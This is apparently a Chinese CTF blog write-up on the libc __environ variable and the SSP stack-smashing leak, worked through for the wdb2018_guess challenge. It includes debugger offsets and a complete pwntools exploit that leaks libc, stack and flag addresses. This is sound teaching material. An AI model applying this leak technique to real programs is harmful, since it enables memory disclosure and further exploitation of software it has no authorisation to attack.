_environ与ssp攻击

已于 2022-03-09 21:29:33 修改
阅读量1.1k 收藏 6
点赞数 5
文章标签: pwn
于 2022-02-21 15:12:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/123042863
版权

_environ

在Linux C中,environ是一个全局变量,它储存着系统的环境变量。

它储存在libc中

因此environ是沟通libc地址与栈地址的桥梁。

如图:即为一个程序中environ的具体信息:

1

environ利用

通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在栈中,通过偏移可以得到栈上任意变量的地址。

ssp攻击

canary的各种利用方式中,有一种是通过 __stack_chk_fail函数打印报错信息来实现。

__stack_chk_fail源码:

void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminatedn",
                    msg, __libc_argv[0] ?: "<unknown>");
}

据源码可见,报错信息中会打印出libc_argv[0]的值,而libc_argv[0]指向的则是程序名。

若我们能够栈溢出足够的长度,覆盖到__libc_argv[0]的位置,那我们就能让程序打印出任意地址的数据,造成任意地址数据泄露。这就是ssp攻击。

实例分析

wdb2018_guess

程序流程

  • 程序将flag读到栈上,并且执行了三次fork函数。

  • 同时有一个任意长度的栈溢出。

关于fork函数:

fork函数用于创建一个与当前进程映像一样的子进程,所创建的子进程将复制父进程的代码段、数据段、BSS段、堆、栈等所有用户空间信息,在内核中操作系统会重新为其申请一个子进程执行的位置。

调试偏移

找到__libc_argv[0]与输入点之间的偏移:

在gets函数处下断点:

2

rdi即为输入点,而程序名即为__libc_argv[0]所处的位置,两者的偏移为:

0x7ffe86c47748-0x7ffe86c47620 = 0x128

第一次fork:泄露libc基址

利用ssp攻击打印出puts函数真实地址:

def fork(content):
    r.recvuntil(b"Please type your guessing flag")
    r.sendline(content)
    
puts_got = elf.got["puts"]

fork(b'a'*0x128+p64(puts_got))
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")

第二次fork:泄露environ所指的栈地址

通过libc与其偏移找到environ地址:

environ_addr = libc_base + libc.dump("__environ")

泄露环境变量地址:

fork(b'a'*0x128+p64(environ_addr))
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
log.success("libc_base:"+hex(libc_base))
log.success("stack_addr:"+hex(stack_addr))

第三次fork:泄露flag

断点依旧下载gets函数处:

3

其中 flag{you_are_a_pig}是我本地flag文件的内容

泄露出来的环境变量的地址是0x7ffc1e329638

所以flag地址与__libc_argv[0]偏移为:

0x7ffc1e329638-0x7ffc1e3294d0 = 0x168

直接用ssp攻击泄露flag:

flag_addr = stack_addr-0x168
fork(b'a'*0x128+p64(flag_addr))

exp

from pwn import *
from LibcSearcher import*
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/BUUCTF/GUESS'
elf = ELF('/mnt/hgfs/ubuntu/BUUCTF/GUESS')

def fork(content):
    r.recvuntil(b"Please type your guessing flag")
    r.sendline(content)

puts_got = elf.got["puts"]
fork(b'a'*0x128+p64(puts_got))
puts_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
environ_addr = libc_base + libc.dump("__environ")
fork(b'a'*0x128+p64(environ_addr))
stack_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))
log.success("libc_base:"+hex(libc_base))
log.success("stack_addr:"+hex(stack_addr))
flag_addr = stack_addr-0x168
fork(b'a'*0x128+p64(flag_addr))
r.interactive()
Loτυs
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VB_Environ系统环境变量函数大全
07-10
VB_Environ系统环境变量函数大全,可参照使用,本人收集整合非原创
composing_environ_primer
11-03
一、引言与背景 在当今复杂的芯片设计领域,系统级验证已成为确保集成电路功能正确性的关键环节。《VMM Primer – 组建环境》是Synopsys公司为帮助工程师创建可重用的系统级验证环境而编写的指南。本文将详细解析该...
CTF权威指南 笔记 -第四章Linux安全机制-4.1-Linux基础
m0_64180167的博客
05-08 623
这里给出linux常用命令。
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 413
stack smash
wdb2018_guess
z1r0的博客
01-19 1005
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environlibc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。 想要知道environ地址还需要知道libc地址libc地址可以通过got来算。 那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
environ泄露地址+orw+uaf
FUCKING12的博客
10-08 605
这个题开了沙箱,有uaf。利用思路:借助environ泄露地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 585
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
PyPI 官网下载 | django_environ-0.3.1-py2-none-any.whl
02-14
"django_environ-0.3.1-py2-none-any.whl"是这个资源的完整名称,它进一步确认了这是一个与Django框架相关的Python库,且兼容Python 2版本。 **标签解析:** "django" - Django是一个广泛使用的开源Web应用框架,用...
Ubuntu20_Auto_ML_DL_Environ:自动安装了ML和DL(pytorch tensorflow keras)环境,并提供了许多有用的工具,Ubuntu 20.04
05-23
Ubuntu-20.04自动ML&DL服务器 :flexed_biceps: 标签: lab z-tech 介绍 该仓库用于为Ubuntu-20.04安装ML&DL环境,并带有pytorch1.4.0 tensorflow2.2.0 keras,此外还安装了vim zshell有用的插件。...
linux4.12 交叉编译链,交叉编译工具链(很详细)
weixin_39539684的博客
05-01 297
搞了一个“中基学生电脑”(详细的见这里http://www.ouravr.com/bbs /bbs_content.jsp?bbs_sn=1420850&bbs_page_no=1&search_mode=4& search_text=dack&bbs_id=9999),当作arm开发板用。但本人对linux不熟,arm更是没有搞过,所以从头开始 学,先编译一套工具...
环境变量
这是书生呀
03-31 255
基本概念: 环境变量一般是指操作系统中用来指定操作系统运行环境的一些参数 环境变量具有某些特殊用途,在系统当中通常具有全局性。(环境变量通常具有全局性,可以被子进程继承下去) 常见的环境变量: PATH 指定命令的搜索路径(查看可执行环境的变量) HOME 当前用户的家目录 SHELL 保存当前使用的shell 它的值通常是bin/bash LD_LIBRARY_PA...
[BUUCTF]PWN——wdb2018_guess(stack smashing--canary报错利用)
mcmuyanga的博客
03-14 1174
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
Linux:环境变量
ll1175555的博客
11-02 1485
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数。环境变量通常具有某些特殊用途,通常具有全局特性,可以被子进程继承下去。
Linux中environ变量的使用
妙木山
11-21 1654
environ变量时一个char**类型的变量,其中存放着系统的全局变量,可以通过对environ输出来输出系统的全局变量。 因为environ是一个外部的全局变量,所以在使用时需要用extern声明一下。另一种使用方法是使用unistd.h头文件,但是在unistd.h头文件中定义environ的地方使用了条件编译#ifdef __USE_GUN,在Linux C中默认没有定义这个宏,所以需要...
pwn100 ssp
Vccxx的博客
04-08 1111
ssp–利用栈溢出保护来泄露内存这payload贼短。。题目链接:sspStack-smashing Protection (SSP,又名 ProPolice),是在函数的栈底插入一个随机数,这个随机数在函数调用结束后会被检测,如果与预设的不同,就会直接退出程序并打印如下的错误提示: *** stack smashing detected ***: ./pwn100 terminated
BUUCTF【GUSESS】(利用canary报错信息ssp攻击)
weixin_51055545的博客
04-29 325
文章目录通过canary报错信息来解题(ssp攻击)前言:背景知识:检查保护:IDA分析:exp分析: 通过canary报错信息来解题(ssp攻击) 前言: ​ 我们知道栈溢出的基本原理是通过发送大量数据,溢出导致覆盖返回地址,劫持程序执行流,针对开启canary保护的题目,程序中存在gets()或类似这样的危险溢出函数,却又没其他洞的情况下,我们可以利用ssp攻击达到get flag,或get shell的目的. 背景知识: ​ 我们输入过多数据,导致栈溢出时,程序puts出来的报错信息同样是调用了__
堆中获取地址和劫持执行流的方法
九层台
09-02 1979
栗子https://github.com/tower111/software.git 0x01获取栈地址 详细writeup:https://tower111.github.io/2018/08/30/ISG-babynote/ 原理:在fast bin是单链在内存中保存,在fd位置处会写入next chunk的地址,这个地址可以用来获取heap_base。 栗子:babynote 需要...
(OK) 自己动手构建Linux发行版---简版
张同光 (Tongguang Zhang):Hello everyone !
06-04 1729
《自己动手构建Linux发行版》 1. 配置环境 [root@localhost ~]# uname -a Linux localhost.localdomain 5.0.10-300.fc30.x86_64 #1 SMP Tue Apr 30 16:22:12 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux [root@localhost ~]# su...
TypeError: '_Environ' object is not callable
最新发布
12-08
TypeError: '_Environ' object is not callable是一个常见的错误,通常是由于在代码中使用了不正确的语法或函数调用而导致的。这个错误通常会在Django或Flask等Web框架中出现,也可能在其他Python应用程序中出现。 解决此错误的方法取决于具体情况,但以下是一些可能的解决方法: 1.检查代码中是否有语法错误或拼写错误。 2.检查代码中是否有重复的变量名或函数名。 3.检查代码中是否有不正确的函数调用。例如,如果您尝试调用一个不是函数的对象,就会出现此错误。 4.检查代码中是否有不正确的导入语句。例如,如果您尝试从模块中导入不存在的函数或类,就会出现此错误。 5.检查代码中是否有不正确的参数传递。例如,如果您尝试将一个不是函数的对象作为函数的参数传递,就会出现此错误。 对于引用中的Django错误,可以根据错误提示和代码中的上下文来确定具体的解决方法。对于引用中的错误,可以尝试使用正确的导入语句,并确保您正在调用正确的函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值